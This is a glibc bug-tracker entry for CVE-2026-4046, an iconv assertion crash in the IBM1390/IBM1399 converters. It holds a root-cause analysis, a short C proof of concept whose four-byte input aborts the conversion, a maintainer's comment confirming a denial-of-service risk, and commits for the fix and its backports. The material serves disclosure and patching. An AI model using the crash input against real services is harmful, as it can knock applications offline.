Bug 33980 (CVE-2026-4046) - iconv: ibm139x trigger assertion error when converting to internal while lack enough room (CVE-2026-4046)
Status: RESOLVED FIXED
Alias: CVE-2026-4046
Product: glibc
Classification: Unclassified
Component: locale
Version: unspecified
Importance: P2 normal
Target Milestone: 2.44
Assignee: Florian Weimer
Reported: 2026-03-12 05:02 UTC by Rocket Ma
Modified: 2026-04-21 21:03 UTC
CC List: 4 users

fweimer: security+


Description Rocket Ma 2026-03-12 05:02:30 UTC
The IBM1390 and IBM1399 encodings, which have the "combined" attribute, can cause glibc to hit an assertion failure. The PoC below demonstrates the bug: compiling and running it makes libc report "../iconv/skeleton.c:594: gconv: Assertion `outbuf == outerr' failed." This was observed on Arch Linux with glibc 2.43+r5+g856c426a7534. According to the git log, `iconvdata/ibm139{0,9}.{c,h}` have not changed since the very first patch.

Here is what I found digging into the code:
1. In FROM_LOOP, the sequence SO COMBINED_WORD SI produces two internal (UCS-4) words in outbuf (SO and SI themselves produce no output);
2. TO_LOOP consumes only one internal word: the user's output buffer is 4 bytes, but converting the two internal words (8 bytes of UCS-4) to UTF-8 needs 6 bytes, so only the first character fits and outerr = outbuf + 4. Since outerr != outbuf, a rerun is needed;
3. In the rerun, FROM_LOOP has its `outend` restricted to outerr. A combined word needs room for two internal words (8 bytes) at once, so the combined-word logic in LOOP returns __GCONV_FULL_OUTPUT without writing anything and outbuf stays at outstart. Therefore outbuf != outerr after the rerun, which triggers the assertion failure.

I wonder whether this is a security bug (DoS): an application affected by CVE-2024-2961 could also be affected by this bug and be aborted by the assertion failure. Since a combined character takes 2 bytes in IBM139x and expands to 6 bytes in UTF-8, malicious input can quickly fill the output buffer and trigger this bug.

---

#define _GNU_SOURCE
#include <errno.h>
#include <iconv.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

static void
die (const char *msg)
{
  perror (msg);
  exit (1);
}

int
main (int argc, char **argv)
{
  setvbuf (stdout, NULL, _IONBF, 0);
  setvbuf (stderr, NULL, _IONBF, 0);

  const char *fromcode = argc >= 2 ? argv[1] : "IBM1390";
  const char *tocode = argc >= 3 ? argv[2] : "UTF-8";
  size_t outsz = argc >= 4 ? strtoul (argv[3], NULL, 0) : 4;

  /* IBM13xx combined-character example: 0xECB5 is a DBCS code that expands
     to two UCS-4 code points (U+304B U+309A). */
  unsigned char input[] = { 0x0e, 0xec, 0xb5, 0x0f };
  char *inptr = (char *) input;
  size_t inleft = sizeof (input);

  if (outsz == 0)
    outsz = 1;
  char *outbuf = malloc (outsz);
  if (!outbuf)
    die ("malloc");
  memset (outbuf, 0x41, outsz);
  char *outptr = outbuf;
  size_t outleft = outsz;

  fprintf (stderr,
           "[*] iconv %s -> %s, in=0e(SO) ecb5 0f(SI), outsz=%zu\n",
           fromcode, tocode, outsz);

  iconv_t cd = iconv_open (tocode, fromcode);
  if (cd == (iconv_t) -1)
    die ("iconv_open");

  errno = 0;
  long rc = iconv (cd, &inptr, &inleft, &outptr, &outleft);

  fprintf (stderr,
           "[*] iconv rc=%ld errno=%d (%s) inleft=%zu outleft=%zu\n",
           rc, errno, strerror (errno), inleft, outleft);

  fwrite (outbuf, 1, outsz - outleft, stdout);
  iconv_close (cd);
  free (outbuf);
  return 0;
}
Comment 1 Florian Weimer 2026-03-12 09:20:34 UTC
Yes, this is a security bug. Crashes in conversions to UTF-8 can make mail folders inaccessible in mutt, for example.
Comment 2 Florian Weimer 2026-03-31 16:12:51 UTC
I think I have a fix for this, I just need to write a proper test case for it.
Comment 3 Florian Weimer 2026-04-07 11:56:53 UTC
Fix with test case posted:

[PATCH v2] Use pending character state in IBM1390, IBM1399 character sets (CVE-2026-4046)
<https://inbox.sourceware.org/libc-alpha/lhucy0b6l2w.fsf@oldenburg.str.redhat.com/>
Comment 4 Sourceware Commits 2026-04-16 17:18:53 UTC
The master branch has been updated by Florian Weimer <fw@sourceware.org>:

https://sourceware.org/git/gitweb.cgi?p=glibc.git;h=d6f08d1cf027f4eb2ba289a6cc66853722d4badc

commit d6f08d1cf027f4eb2ba289a6cc66853722d4badc
Author: Florian Weimer <fweimer@redhat.com>
Date:   Thu Apr 16 19:13:43 2026 +0200

    Use pending character state in IBM1390, IBM1399 character sets (CVE-2026-4046)
    
    Follow the example in iso-2022-jp-3.c and use the __count state
    variable to store the pending character.  This avoids restarting
    the conversion if the output buffer ends between two 4-byte UCS-4
    code points, so that the assert reported in the bug can no longer
    happen.
    
    Even though the fix is applied to ibm1364.c, the change is only
    effective for the two HAS_COMBINED codecs for IBM1390, IBM1399.
    
    The test case was mostly auto-generated using
    claude-4.6-opus-high-thinking, and composer-2-fast shows up in the
    log as well.  During review, gpt-5.4-xhigh flagged that the original
    version of the test case was not exercising the new character
    flush logic.
    
    This fixes bug 33980.
    
    Assisted-by: LLM
    Reviewed-by: Carlos O'Donell <carlos@redhat.com>
Comment 5 Florian Weimer 2026-04-16 17:19:26 UTC
Fixed for 2.44 so far.
Comment 6 Sourceware Commits 2026-04-19 09:34:00 UTC
The release/2.43/master branch has been updated by Aurelien Jarno <aurel32@sourceware.org>:

https://sourceware.org/git/gitweb.cgi?p=glibc.git;h=8362e8ce10b24068bacc19552c128dd10e082fd9

commit 8362e8ce10b24068bacc19552c128dd10e082fd9
Author: Florian Weimer <fweimer@redhat.com>
Date:   Thu Apr 16 19:13:43 2026 +0200

    Use pending character state in IBM1390, IBM1399 character sets (CVE-2026-4046)
    
    (cherry picked from commit d6f08d1cf027f4eb2ba289a6cc66853722d4badc)
Comment 7 Sourceware Commits 2026-04-19 10:58:26 UTC
The release/2.42/master branch has been updated by Aurelien Jarno <aurel32@sourceware.org>:

https://sourceware.org/git/gitweb.cgi?p=glibc.git;h=f13c1bb0f97fbc12a6ba1ab5669ce561ea32b80a

commit f13c1bb0f97fbc12a6ba1ab5669ce561ea32b80a
Author: Florian Weimer <fweimer@redhat.com>
Date:   Thu Apr 16 19:13:43 2026 +0200

    Use pending character state in IBM1390, IBM1399 character sets (CVE-2026-4046)
    
    (cherry picked from commit d6f08d1cf027f4eb2ba289a6cc66853722d4badc)
Comment 8 Sourceware Commits 2026-04-20 20:23:58 UTC
The release/2.41/master branch has been updated by Aurelien Jarno <aurel32@sourceware.org>:

https://sourceware.org/git/gitweb.cgi?p=glibc.git;h=61737f43b1f0d9f64a6f16649625476b70f9f4d3

commit 61737f43b1f0d9f64a6f16649625476b70f9f4d3
Author: Florian Weimer <fweimer@redhat.com>
Date:   Thu Apr 16 19:13:43 2026 +0200

    Use pending character state in IBM1390, IBM1399 character sets (CVE-2026-4046)
    
    (cherry picked from commit d6f08d1cf027f4eb2ba289a6cc66853722d4badc)
Comment 9 Sourceware Commits 2026-04-20 21:01:11 UTC
The release/2.40/master branch has been updated by Aurelien Jarno <aurel32@sourceware.org>:

https://sourceware.org/git/gitweb.cgi?p=glibc.git;h=f82c16babf26c9d4c46399111ed8383d84c93d67

commit f82c16babf26c9d4c46399111ed8383d84c93d67
Author: Florian Weimer <fweimer@redhat.com>
Date:   Thu Apr 16 19:13:43 2026 +0200

    Use pending character state in IBM1390, IBM1399 character sets (CVE-2026-4046)
    
    (cherry picked from commit d6f08d1cf027f4eb2ba289a6cc66853722d4badc)
Comment 10 Sourceware Commits 2026-04-20 22:00:44 UTC
The release/2.39/master branch has been updated by Aurelien Jarno <aurel32@sourceware.org>:

https://sourceware.org/git/gitweb.cgi?p=glibc.git;h=3e13579841429c56ad5497e6562c47067d8a53b0

commit 3e13579841429c56ad5497e6562c47067d8a53b0
Author: Florian Weimer <fweimer@redhat.com>
Date:   Thu Apr 16 19:13:43 2026 +0200

    Use pending character state in IBM1390, IBM1399 character sets (CVE-2026-4046)
    
    (cherry picked from commit d6f08d1cf027f4eb2ba289a6cc66853722d4badc)
Comment 11 Sourceware Commits 2026-04-21 17:08:10 UTC
The release/2.38/master branch has been updated by Aurelien Jarno <aurel32@sourceware.org>:

https://sourceware.org/git/gitweb.cgi?p=glibc.git;h=55b2c0820d47b5983b4210f96991f87f11ebe7c5

commit 55b2c0820d47b5983b4210f96991f87f11ebe7c5
Author: Florian Weimer <fweimer@redhat.com>
Date:   Thu Apr 16 19:13:43 2026 +0200

    Use pending character state in IBM1390, IBM1399 character sets (CVE-2026-4046)
    
    (cherry picked from commit d6f08d1cf027f4eb2ba289a6cc66853722d4badc)
Comment 12 Sourceware Commits 2026-04-21 20:22:52 UTC
The release/2.37/master branch has been updated by Aurelien Jarno <aurel32@sourceware.org>:

https://sourceware.org/git/gitweb.cgi?p=glibc.git;h=ba37b7465239b5496b013dd5279b495a4a0f4eb5

commit ba37b7465239b5496b013dd5279b495a4a0f4eb5
Author: Florian Weimer <fweimer@redhat.com>
Date:   Thu Apr 16 19:13:43 2026 +0200

    Use pending character state in IBM1390, IBM1399 character sets (CVE-2026-4046)
    
    (cherry picked from commit d6f08d1cf027f4eb2ba289a6cc66853722d4badc)
Comment 13 Sourceware Commits 2026-04-21 21:03:59 UTC
The release/2.36/master branch has been updated by Aurelien Jarno <aurel32@sourceware.org>:

https://sourceware.org/git/gitweb.cgi?p=glibc.git;h=7abd383d439dc348419a9fd526d42ea4591e8aaf

commit 7abd383d439dc348419a9fd526d42ea4591e8aaf
Author: Florian Weimer <fweimer@redhat.com>
Date:   Thu Apr 16 19:13:43 2026 +0200

    Use pending character state in IBM1390, IBM1399 character sets (CVE-2026-4046)
    
    (cherry picked from commit d6f08d1cf027f4eb2ba289a6cc66853722d4badc)